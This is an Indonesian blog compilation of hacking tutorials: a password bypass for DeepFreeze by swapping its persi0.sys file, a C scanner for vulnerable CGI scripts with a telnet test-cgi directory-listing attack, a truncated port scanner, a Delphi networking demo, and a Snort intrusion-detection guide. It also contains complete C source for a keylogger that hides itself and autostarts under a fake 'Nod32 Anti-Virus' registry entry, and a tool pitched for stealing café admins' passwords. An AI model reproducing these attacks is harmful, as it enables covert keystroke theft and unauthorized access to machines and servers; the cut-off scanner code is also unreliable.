9. Selanjutnya masuk komputer anda yang DeepFreeze-nya terpassword. Copikan file bakmi.sys yang sudah anda buat ke dalam drive yang tidak diproteksi oleh DeepFreeze. Bila drive C diproteksi oleh DeepFreeze maka jangan masukkan bakmi.sys ke drive C, karena file ini akan dihapus oleh DeepFreeze. Anggap saja kita kopikan bakmi.sys ke drive D. Windows Recovery Console seperti cara sebelumnya. Rename file persi0.sys dengan nama lain. Copikan file bakmi.sys di drive D menjadi persi0.sys di drive C.

C:Windows>cd c: ----- pindah direktori
C:>ren persi0.sys Cp_persi0.sys ----- rename persi0.sys dengan nama lain
C:>copy d:Bakmi.sys c:persi0.sys ----- copy file baru menjadi persi0.sys
C:>exit

10. Masuk Windows, Masuk program DeepFreeze(konfigurasi) : Tekan Ctrl+Shift pada keyboard sambil mengklik icon DeepFreeze di Taskbar. Muncul kotak password. Isikan dengan password yang baru saja anda buat yaitu : Bakmi. Anda sudah bisa masuk file konfigurasi, tanpa perlu menginstall ulang DeepFreeze.Tanpa perlu install ulang windows.

Catatan :

Bila anda melakukan cara yang lebih ekstrim, seperti menghapus/merename file persi0.sys tanpa menggantikannya dengan file lain maka ada resiko system menjadi tidak stabil atau icon DeepFreeze-nya malah hilang dari Taskbar.

Ide-ide di atas bisa anda coba, bila DeepFreeze anda mengalami kerusakan sehingga meskipun anda ingat passwordnya tetapi program DeepFreeze itu sendiri hilang lenyap tidak tampak di Taskbar dan tidak bisa dipanggil. Kemungkinan besar ada file yang corrupt, bisa jadi file tersebut adalah file persi0.sys. Coba lakukan cara yang sama.

Untuk Deep Freeze versi 6 :

Caranya persis sama dengan Deep Freeze versi 5. Hanya saja untuk versi tertentu namanya lain yaitu $persi0.sys. Jadi kalau untuk DF versi 5 yang harus anda replace adalah file persi0.sys untuk DF versi 6 file yang harus anda replace adalah $persi0.sys (ada tambahan tanda dollar di depan).

Lha cara mereplacenya tentunya suka-suka anda, mau pake Linux, mau pake DOS, pake sistem oparasi portabel ya terserah situlah. Pada contoh ini saya cukup memanfaatkan Recovery Consolnya XP saja, karena nggak merasa butuh program lain.

Oke saudara sebangsa setanah air maupun saudara yang tidak sebangsa dan tidak setanah air. Sekian sedikit sharing dari saya. Mohon maaf bila ada kekurangan.

Menjebol apache web server melalui test-cgi

Langsung saja, pertama yg perlu dipersiapkan oleh kita adalah scanner untuk melihat vulnerability dari web tersebut, disini saya sertakan juga source programnya, dalam C.




#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define RMT_PORT 80
#define OXO 1
#define LOOK "200 OK" /* ALL PROBLES HAVE A SOLUTION */
#define OUT_FILE "DOuiD.cgi" /* The out-put file with the result */

main(int argc, char *argv[])
{

struct sockaddr_in rmt_host;
struct hostent *rh;

FILE *f;
char buffer1[BUFSIZ];
char buffer2[BUFSIZ];
char *cgi[100]; /* You Can Change It Of Course */
char *name[100]; /* Here Also */

int sock,i=1;

memset(cgi,0,100);
memset(name,0,100);

memset(buffer1,0,BUFSIZ);
memset(buffer2,0,BUFSIZ);

/* THe CGI's List /cgi-bin/*.* */

cgi[1] = "GET /cgi-bin/phf SH \n\n";
cgi[2] = "GET /cgi-bin/test-cgi SH \n\n";
cgi[3] = "GET /cgi-bin/nph-test-cgi SH \n\n";
cgi[4] = "GET /cgi-bin/whois_raw.cgi SH \n\n";
cgi[5] = "GET /cgi-bin/Count.cgi SH \n\n";
cgi[6] = "GET /cgi-bin/search/tidfinder.cgi SH \n\n";
cgi[7] = "GET /cgi-bin/finger SH \n\n";
cgi[8] = "GET /cgi-bin/tablebuild.pl SH \n\n";
cgi[9] = "GET /cgi-bin/displayTC.pl SH \n\n";
cgi[10] = "GET /cgi-bin/uptime SH \n\n";
cgi[11] = "GET /cgi-bin/cvsweb/src/usr.bin/rdist/expand.c SH \n\n";
cgi[12] = "GET /cgi-bin/c_download.cgi SH \n\n";
cgi[13] = "GET /cgi-bin/program.pl SH \n\n";
cgi[14] = "GET /cgi-bin/ntitar.pl SH \n\n";
cgi[15] = "GET /cgi-bin/enter.cgi SH \n\n";
cgi[15] = "GET /cgi-bin/query_string.cgi SH \n\n";
cgi[16] = "GET /cgi-bin/AT-generate.cgi SH \n\n";
cgi[17] = "GET /cgi-bin/test.html SH \n\n";
cgi[18] = "GET /cgi-bin/test-unix.html SH \n\n";
cgi[19] = "GET /cgi-bin/printenv SH \n\n";
cgi[20] = "GET /cgi-bin/dasp/fm_shell.asp SH \n\n";
cgi[21] = "GET /cgi-bin/wa SH \n\n";
cgi[22] = "GET /cgi-bin/visadmin.exe SH \n\n";
cgi[23] = "GET /cgi-bin/wguest.exe SH \n\n";
cgi[24] = "GET /cgi-bin/rguest.exe SH \n\n";
cgi[25] = "GET /cgi-bin/AnyForm2 SH \n\n";
cgi[26] = "GET /cgi-dos/args.bat SH \n\n";
cgi[27] = "GET /cgi-bin/perlshop.cgi SH \n\n";
cgi[28] = "GET /cgi-bin/edit.pl SH \n\n";
cgi[29] = "GET /cgi-bin/guestbook.cgi SH \n\n";
cgi[30] = "GET /cgi-bin/cgiwrap SH \n\n";
cgi[31] = "GET /cgi-bin/wrap SH \n\n";
cgi[32] = "GET /cgi-bin/environ.cgi SH \n\n";
cgi[33] = "GET /cgi-bin/classifieds.cgi SH \n\n";
cgi[34] = "GET /cgi-bin/textcounter.pl SH \n\n";
cgi[35] = "GET /cgi-win/uploader.exe SH \n\n";
cgi[36] = "GET /cgi-bin/nph-publish SH \n\n";
cgi[37] = "GET /cgi-bin/handler SH \n\n";
cgi[38] = "GET /cgi-bin/faxsurvey SH \n\n";
cgi[39] = "GET /cgi-bin/php.cgi SH \n\n";
cgi[40] = "GET /cgi-bin/wwwboard.pl SH \n\n";
cgi[41] = "GET /cgi-bin/websendmail SH \n\n";
cgi[42] = "GET /cgi-bin/rwwwshell.pl SH \n\n";
cgi[43] = "GET /cgi-bin/campas SH \n\n";
cgi[44] = "GET /cgi-bin/webdist.cgi SH \n\n";
cgi[45] = "GET /cgi-bin/aglimpse SH \n\n";
cgi[46] = "GET /cgi-bin/man.sh SH \n\n";
cgi[47] = "GET /cgi-bin/info2www SH \n\n";
cgi[48] = "GET /cgi-bin/jj SH \n\n";
cgi[49] = "GET /cgi-bin/files.pl SH \n\n";
cgi[50] = "GET /cgi-bin/maillist.pl SH \n\n";
cgi[51] = "GET /cgi-bin/filemail.pl SH \n\n";
cgi[52] = "GET /cgi-bin/bnbform.cgi SH \n\n";
cgi[53] = "GET /cgi-bin/survey.cgi SH \n\n";
cgi[54] = "GET /cgi-bin/glimpse SH \n\n";
cgi[55] = "GET /cgi-bin/www-sql SH \n\n";

/* CGi Description */

name[1] = "phf ";
name[2] = "test-cgi ";
name[3] = "nph-test-cgi ";
name[4] = "whois_raw.cgi ";
name[5] = "Count.cgi ";
name[6] = "tidfinder.cgi ";
name[7] = "finger ";
name[8] = "tablebuild.pl ";
name[9] = "displayTC.pl ";
name[10] = "uptime ";
name[11] = "expand.c ";
name[12] = "c_download.cgi ";
name[13] = "program.pl ";
name[14] = "ntitar.pl ";
name[15] = "enter.cgi ";
name[16] = "query_tring.cgi ";
name[17] = "test.html ";
name[18] = "test-unix.html ";
name[19] = "printenv ";
name[20] = "fm_shell.asp ";
name[21] = "wa ";
name[22] = "visadmin.exe ";
name[23] = "wguest.exe ";
name[24] = "rguest.exe ";
name[25] = "AnyForm2 ";
name[26] = "args.bat ";
name[27] = "perlshop.cgi ";
name[28] = "edit.pl ";
name[29] = "guestbook ";
name[30] = "cgiwrap ";
name[31] = "wrap ";
name[32] = "environ.cgi ";
name[33] = "classifieds.cgi ";
name[34] = "textcounter.pl ";
name[35] = "uploader.exe ";
name[36] = "nph-publish ";
name[37] = "handler ";
name[38] = "faxsurvey ";
name[39] = "php.cgi ";
name[40] = "wwwboard.pl ";
name[41] = "websendmail ";
name[42] = "rwwwshwll ";
name[43] = "campas ";
name[44] = "webdist.cgi ";
name[45] = "aglimpse ";
name[46] = "man.sh ";
name[47] = "info2www ";
name[48] = "jj ";
name[49] = "files.pl ";
name[50] = "maillist.pl ";
name[51] = "filemail.pl ";
name[52] = "bnbform.cgi ";
name[53] = "survey.cgi ";
name[54] = "slinpse ";
name[55] = "www-sql ";

if ((f=fopen(OUT_FILE,"a"))==NULL){
perror("fopen");
exit(OXO);
}

if (argc != 2){
fprintf(stderr,"Usage: %s \ncgiS.c By ZinC_Sh(C).\n",argv[0]);
exit(OXO);
}

if ((rh=gethostbyname(argv[1])) == NULL){
perror("gethostbyname");
exit(OXO);
}

printf("\t\t\t\b\b------------------------\n");
printf("\t\t\t\b\b|\033[6;35m CGi Scaner V1.0.1 .- \033[0m|\n");
printf("\t\t\t\b\b|\033[6;35m By Scorpionbugs(C).- \033[0m|\n");
printf("\t\t\t\b\b------------------------\n\n");

while (i < 55)
{
if((sock=socket(AF_INET,SOCK_STREAM,0)) == -1){
perror("Socket");
exit(OXO);
}

bzero(&(rmt_host.sin_zero),8);
rmt_host.sin_family = AF_INET;
rmt_host.sin_addr = *((struct in_addr *)rh->h_addr);
rmt_host.sin_port = htons(RMT_PORT);

if (connect(sock,(struct sockaddr *) &rmt_host ,sizeof(rmt_host)) != 0){
perror("connect");
exit(OXO);
}

printf("LookinG For %s\b\b\b\bCGI in /cgi-bin/ :",name[i]);

send(sock,cgi[i],sizeof(cgi),0);
recv(sock,buffer1,sizeof(buffer1),0);

if((strstr(buffer1,LOOK)) != 0){
printf("\t\033[1;32mCGI FounD !!!\033[0m\n");
fputs("FounD !!!",f);
fputs(cgi[i],f);
} else {
printf("\tCGI NoT FounD.\n");
}

close(sock);
i++;
}

printf("\nKapUt !\nMay The Poula KApribekou Be With You... (ZinC_Sh).\n");
printf("The Results Will Be Found In THe DOuiD.cgi File.\n");

fclose(f);
return 0;
}


cara compile : gcc cgis.c -o cgis

kalo udah di compile trus sekarang waktunya hack dengan syntak

#cgis 10.1.xx.xx
looking for phf CGI in /cgi-bin/ : CGI Not Found
looking for test-cgi CGI in /cgi-bin/ : CGI Found !!!!
bla bla bla
bla bla
bla

dan hasil scannya disimpan di file DOuiD.cgi, di file ini sih cuma ngasih tahu aja hasil proses scan tersebut
nah dibaris kedua kita bisa lihat ternyata cgi-bin/test-cgi ada dan open dalam web tersebut

selanjutnya tinggal kita telnet ke 10.1.xx.xx melalui port 80

#telnet 10.1.xx.xx 80
Trying 10.1.xx.xx
Connected to 10.1.xx.xx Escape character is '^}'
GET /cgin-bin/test-cgi?/* report:argc is 1. argv is /\*. SERVER_SOFTWARE = NCSA/1.4.1 SERVER_NAME = removed.name.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/0.9 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /bin/cgi-bin/test-cgi QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt /root
/sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

nah di query_string kita bisa lihat seluruh directory selanjutnya terserah anda, saya menyarankan jangan mengubah atau menggangu
isi directory tersebut. selamat mencoba

Menjebol server melalui Service FTP

Menjebol server melalui FTP dengan menggunakan scanner cukup mudah. Pertama yang perlu disiapkan adalah scanner, saya menyertakannya sourcenya dalam C. Berikut adalah code yang hanya perlu anda compile dengan gcc -o.



#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define DEF_STR_PORT 1
#define DEF_STP_PORT 1024
#define OXO 1

struct sockaddr_in addr;
struct hostent *rh;
struct servent *rp;

int sock,i;
int str_ptr, stp_ptr;
int Usage(char *ARG);
int CONNECTION(int port);

int main(int argc, char *argv[])
{
if (argc != 4)
Usage(argv[0]);

str_ptr = atoi(argv[2]);
stp_ptr = atoi(argv[3]);
if (strcmp(argv[2],"-")==0 &&
strcmp(argv[3],"-")==0){
str_ptr = DEF_STR_PORT;
stp_ptr = DEF_STP_PORT;
}
if ( str_ptr > stp_ptr){
fprintf(stderr,"DetecT ErroR !!! On PortS,

Can't Be Greater
Than .-\n");
Usage(argv[0]);
exit(OXO);
}

if ((rh=gethostbyname(argv[1])) == NULL){
fprintf(stderr,"Can't Resolve Host %s
.-\n",argv[1]);
Usage(argv[0]);
exit(OXO);
}

printf("ScanninG Host %s From %d TcP Port To %d
.-\n",argv[1],str_ptr,stp_ptr);
for (i=str_ptr; i <= stp_ptr; i++)
{
if (CONNECTION(i)==0)
{
rp=getservbyport(htons(i),"tcp");
printf("Port %d Is Open !!!


Jangan digunain untuk hal-hal yang merugikan orang lain..!!

Networking Dengan Delphi

Tools dan Perlengkapan


- Delphi + Indy 9 (google it !)

- Komputer dalam jaringan (pake VMware juga bisa)

- Seperti biasa, Dream Theater dengan lagunya Octavarium


Langkah Kerja


-Berhubung kita membuat dua program, sekarang kita buat program client dulu yach


- Jalanin Delphi, buat project baru

- Di form1, tambahkan item:

- 1 Indy TCPClient

- 1 Button

- 1 Edit box

- Di event Form1-onCreate, masukkin code berikut:


IdTCPClient1.Host := '192.168.1.2'; //Ganti sesuai kebutuhan

IdTCPClient1.Port := 123; //Ganti sesuai kebutuhan

idTCPClient1.Connect;

idTCPClient1.WriteLn('Connected !');


Penjelasan:

Code di atas gunanya untuk ngasih tau idTCPClient1 bahwa hostnya 192.168.1.2 dan port 123. Perintah connect gunanya ya untuk connect ke server. Sedangkan perintah WriteLn gunanya untuk ngirim string berisi 'Connected !' ke server


- Pada event Button1-onClick, masukkin code berikut:


idTCPClient.WriteLn(Edit1.Text);


Penjelasan:

Dengan perintah WriteLn, idTCPClient1 ngirim string ke server yang isinya sama dengan text pada Edit1


OK, untuk sementara cukup dengan client.


Sekarang saatnya berpindah ke komputer server.

- Jalanin Delphi, buat project baru

- di form1, tambahkan item:

- 1 Indy TCPServer

- Di event Form1-onCreate, ketikkan code berikut:


idTCPServer1.DefaultPort := 123;

idTCPServer1.Active := True;


Penjelasan:

Property DefaultPort gunanya untuk ngasih tau idTCPServer1 bahwa default port-nya 123. Perintah Active gunanya ya untuk ngaktifin idTCPServer1


- Di event idTCPServer1-onExecute, ketikkan code berikut:


ShowMessage(AThread.Connection.ReadLn);


Penjelasan:

Perintah ShowMessage gunanya untuk menampilkan pesan dalam bentuk messagebox, isinya string yang dikirimkan dari client


Yap, that's it ! Program kita udah jadi, sekarang saatnya untuk ngeliat hasilnya.

Jalankan program server di komputer A, trus program client di komputer B. Ingat, ganti host dari idTCPClient1 dengan IP address-nya komputer A. Kalo udah, tinggal ketikkin pesan di edit box dalam program client, klik Button1. Dan kalo Anda melakukan dengan benar, seharusnya apa yang diketikkin di komputer client bakal muncul di komputer server. OK, untuk saat ini sekian dulu. Silakan kembangkan artikel ini untuk membuat program jaringan yang berguna. Happy coding !


Local KeyLogger

Ini ada sedikit source untuk yang suka main2 dengan yang namanya keylogger. Ini script tinggal di compile aja yah, silahkan dikembangin jika ada yang ingin mengembanginnya..

Code :
===========start================
#include
#include
#define KEY "c:\windows\Nod32Bak.exe"
#define LOG "c:\log.txt"

int keylogging(void)
{
short lul;
while(1)
{
Sleep(5);
for(lul=8;lul<=222;lul++)
{
if(GetAsyncKeyState(lul)==-32767)
{
FILE *fp;
fp = fopen(LOG,"a+");
if(fp == NULL)
{
return 1;
}
if(fp != NULL)
{
if((lul >= 39) && (lul <= 64))
{
fputc(lul,fp);
fclose(fp);
break;
}
else if((lul > 64) && (lul <>
{
lul+=32;
fputc(lul,fp);
fclose(fp);
break;
}
else
{
switch(lul)
{
case VK_SPACE:
fputc(' ',fp);
fclose(fp);
break;
case VK_SHIFT:
fputs("[SHIFT]",fp);
printf("[SHIFT]");
fclose(fp);
break;
case VK_RETURN:
fputs(" [ENTER]",fp);
fclose(fp);
break;
case VK_BACK:
fputs("[BACKSPACE]",fp);
fclose(fp);
break;
case VK_TAB:
fputs("[TAB]",fp);
fclose(fp);
break;
case VK_CONTROL:
fputs("[CTRL]",fp);
fclose(fp);
break;
case VK_DELETE:
fputs("[DEL]",fp);
fclose(fp);
break;
case VK_OEM_1:
fputs("[;:]",fp);
fclose(fp);
break;
case VK_OEM_2:
fputs("[/?]",fp);
fclose(fp);
break;
case VK_OEM_3:
fputs("[`~]",fp);
fclose(fp);
break;
case VK_OEM_4:
fputs("[ [{ ]",fp);
fclose(fp);
break;
case VK_OEM_5:
fputs("[\|]",fp);
fclose(fp);
break;
case VK_OEM_6:
fputs("[ ]} ]",fp);
fclose(fp);
break;
case VK_OEM_7:
fputs("['"]",fp);
fclose(fp);
break;
case VK_NUMPAD0:
fputc('0',fp);
fclose(fp);
break;
case VK_NUMPAD1:
fputc('1',fp);
fclose(fp);
break;
case VK_NUMPAD2:
fputc('2',fp);
fclose(fp);
break;
case VK_NUMPAD3:
fputc('3',fp);
fclose(fp);
break;
case VK_NUMPAD4:
fputc('4',fp);
fclose(fp);
break;
case VK_NUMPAD5:
fputc('5',fp);
fclose(fp);
break;
case VK_NUMPAD6:
fputc('6',fp);
fclose(fp);
break;
case VK_NUMPAD7:
fputc('7',fp);
fclose(fp);
break;
case VK_NUMPAD8:
fputc('8',fp);
fclose(fp);
break;
case VK_NUMPAD9:
fputc('9',fp);
fclose(fp);
break;
case VK_CAPITAL:
fputs("[CAPS LOCK]",fp);
fclose(fp);
break;
default:
fclose(fp);
break;
}
}
}
}
}
}
}
int main(int argc, char **argv)
{
CopyFile(argv[0], KEY, 0);

HWND own = FindWindow(0,argv[0]);
ShowWindow(own, SW_HIDE);

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\Mcft\Windows\CurrentVersion\Run",0,KEY_SET_VALUE,&hKey);
RegSetValueEx(hKey,"Nod32 Anti-Virus",0,REG_SZ,(const unsigned char*)KEY,sizeof(KEY));
RegCloseKey(hKey);

CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)keylogging,0,0,0);
system("pause");
}
=============END==============

semoga bermanfaat

Monitoring Serangan Hacker Ke Jaringan Dengan Snort

Snort merupakan salah satu software favorit yang digunakan untuk memproteksi network dari serangan hacker. Proteksi tambahan ini cukup memadai untuk menghindari serangan hacker pada umumnya.


'SNORT' merupakan salah satu software untuk mendeteksi intrusi pada system, mampu menganalisa 'real-time traffic' dan logging ip, mampu menganalisa port dan mendeteksi segala macam 'serangan' dari luar seperti buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting. secara default nya snort mempunyai 3 hal yang terpenting yaitu :

(1) paket sniffer, seperti tcpdump, iptraf dll
(2) paket logger, yang berguna untuk paket traffic dll
(3) NIDS, deteksi intrusi pada network.


1.1 Pengenalan

Snort bukanlah software yang sulit, tapi perlu banyak latihan karena banyaknya 'command-command' yang harus digunakan, tujuan dari pembuatan artikel ini untuk membuat user lebih mudah untuk mengenali 'snort'.

1.2 Instalasi

download paket yang terbaru dari snort.org, saya disini menggunakan snort 2.0.0

# wget -c http://www.snort.org/dl/snort-2.0.0.tar.gz


jangan lupa juga mendownload rules terbaru.

# wget -c http://www.snort.org/dl/rules/snortrules-stable.tar.gz


extract dan install paket snort

# tar -zxvf snort-2.0.0.tar.gz ; cd snort-x.x.x ; ./configure ; make ; make install


untuk lebih lengkap nya silahkan baca ./configure --help secara default snort akan terinstall di /usr/local/bin/snort


1.3 Paket Sniffer

fyuh, mari coba pelajaran dasar dulu ;) jika anda ingin menampilkan TCP/IP header ke layar ( mis. sniffer mode ), coba perintah ini:

# snort -v

command di atas akan menjalan snort dan hanya akan menampilkan IP dan TCP/UDP/ICMP header, tapi jika anda mau melihat transit data coba dengan command ini

# snort -vd


instruksi tersebut akan menampilkan transit data, tapi jika anda mau lebih spesifik coba dengan


# snort -vde



1.3 Paket logger

ok, command-command di atas mungkin hanya sebagai pengenalan, pada instruksi diatas ada kasus dimana kita tidak mungkin melihat ke layar setiap menit nya ;) oleh karena itu dibutuhkan log, sebelum nya buat direktori 'log' di direktori kerja anda sekarang

# mkdir -p log

# snort -dve -l ./log



Jika instruksi diatas dijalankan, tetapi anda belum membuad direktory log, maka snort akan segera berhenti dengan keterangan 'ERROR: log directory './log' does not exist', jika berhasil, snort akan menyimpan setiap paket ke dalam direktori-direktory IP address, jika sistem anda memiliki beberapa network tetapi anda hanya ingin memonitor network tertentu saja.


# snort -dev -l ./log -h 192.168.1.0/24


Rules ini akan menyimpan setiap data link dan TCP/IP header ke dalam direktory 'log' dan menyimpan setiap paket dari 192.168.1.0 kelas C network.


1.4 Mendeteksi 'Pengacau' Jaringan

Sebelum ini di bahas, sebaik nya anda membaca manual dari snort.org, http://www.snort.org/docs/writing_rules/chap2.html , disini diminta untuk membuat rules sendiri atau anda bisa memakai rules yang di sedikan oleh snort.org sendiri.


# tar -zxvf snortrules-stable.tar.gz


tapi, saya coba membuat rules sendiri, karena saya kurang suka dengan paket dari orang lain, setelah di gunain tapi tidak tahu gunanya buat apa ;) contoh rules sederhana

# cd rules; touch avudz.conf

# vi avudz.conf

alert tcp any any -> ipsaya/29 21 (content: "root"; \

msg: "FTP root login";)

alert tcp any any -> ipprivate/24 22 (msg:"sshd access";)

alert tcp any any -> ipsaya/29 21 (content: "anonymous"; \

msg: "Ada yg Coba FTP server!";)

alert tcp any any -> ipsaya/29 22 (msg:"ada yang login";)

# http://www.linuxsecurity.com/feature_stories/feature_story-144.html


Content digunakan untuk mendefinisikan inputan dari $user, sedangkan msg untuk membuat pernyataan tentang $user yang menggunakan 'content' tersebut.

sebelum rules baru ini di jalankan, pastikan anda membuat direktory logging di /var/log/snort

# mkdir -p /var/log/snort


tetapi jika anda merasa partisi /var anda sudah minim, silahkan buat symbolic link untuk logging, misal

# ln -s /home/avudz/snort/log /var/log/snort


ok, selesai sudah ;) sekarang coba kita jalankan software nya.


# snort -d -c rules/avudz.conf

Running in IDS mode

Log directory = /var/log/snort

Initializing Network Interface eth0



setelah itu silahkan anda coba ftp / ssh ke server anda dari network yang berbeda ( diconfig saya menggunakan ip public), dan pantau traffic nya.


# tail -f /var/log/snort/alert



contoh :


[**] [1:0:0] ada yang login [**]

[Priority: 0]

06/12-05:47:23.911639 202.xxx.xxx.xx:3962 -> 202.xxx.xxx.xxx:22

TCP TTL:64 TOS:0x10 ID:57036 IpLen:20 DgmLen:52 DF

***A**** Seq: 0xAC015F2A Ack: 0xAD5438B5 Win: 0x3EBC TcpLen: 32

TCP Options (3) => NOP NOP TS: 16723031 55655688

[**] [1:0:0] Ada yg Coba FTP server! [**]

[Priority: 0]

06/12-05:48:24.419800 202.xxx.xxx.xx:3971 -> 202.xxx.xxx.xxx:21

TCP TTL:64 TOS:0x10 ID:57642 IpLen:20 DgmLen:68 DF

***AP*** Seq: 0xAE133FB1 Ack: 0xAFCB3637 Win: 0x3EBC TcpLen: 32

TCP Options (3) => NOP NOP TS: 16729081 55661127



Ah.. selesai sudah, tinggal tambahin beberapa rules yang dibutuhkan untuk memantau aktivitas 'machine' anda ;) misalnya iseng mo monitor irc server, tinggal tambahin di avudz.conf

# vi rules/avudz.conf

alert tcp ipsaya any -> any 6666:7000 (msg:"CHAT IRC "; flow:to_server,established; content: "NICK "; offset:0; classtype:misc-activity; sid:542; rev:8;)

alert tcp ipsaya any -> any 6666:7000 (msg:"permintaan DCC Chat "; flow:to_server,established; content:"PRIVMSG "; nocase; offset:0; content:" \:.DCC SEND"; nocase; classtype:misc-activity; sid:1639; rev:3;)

# === done === #


Semua config dan rules nya bisa anda pelajari dari file snortrules-stable.tar.gz yang sudah di extract, seperti msyql rules, backdoor rules, ICMP rules, bad traffic rules dll. yang penting adalah mencoba, jangan pernah menyerah! MERDEKA!! =)

Referensi :

1. http://www.snort.org/

2. http://www.snort.org/docs/writing_rules/chap2.html

3. http://marc.theaimsgroup.com/?l=snort-users

Tuesday, July 22, 2008

Mencari password admin menggunakan admin password finder

Waaa,,, penulis kali ini mau kasih cara jail untuk mengetahui password admin, cocok banget ni buat yang mau iseng pas maen di warnet cara nya juga sangat mudah, pada chart's area, ceklist aja semua kotaknya agar mendapatkan hasil yang maksimal, dan pada how many chart's for start search anda bisa pilih berapa jumlah karakter untuk memulai pencarian, kalo menurut saya sih isi 4 aja coz masa iye password admin cuman 3karakter. Terus kalo passwordnya ada yg kejaring, anda tinggal ganti password tersebut dengan mengklik pada tombol switch to password changer.. Selamat mencoba, dan jail sedikit kan gpp, buat ngasih pelajaran untuk admin yang biasanya sok pinter





















Untuk Download klik disini.
 

Indahnya Berbagi Copyright © 2012 Fast Loading -- Powered by Blogger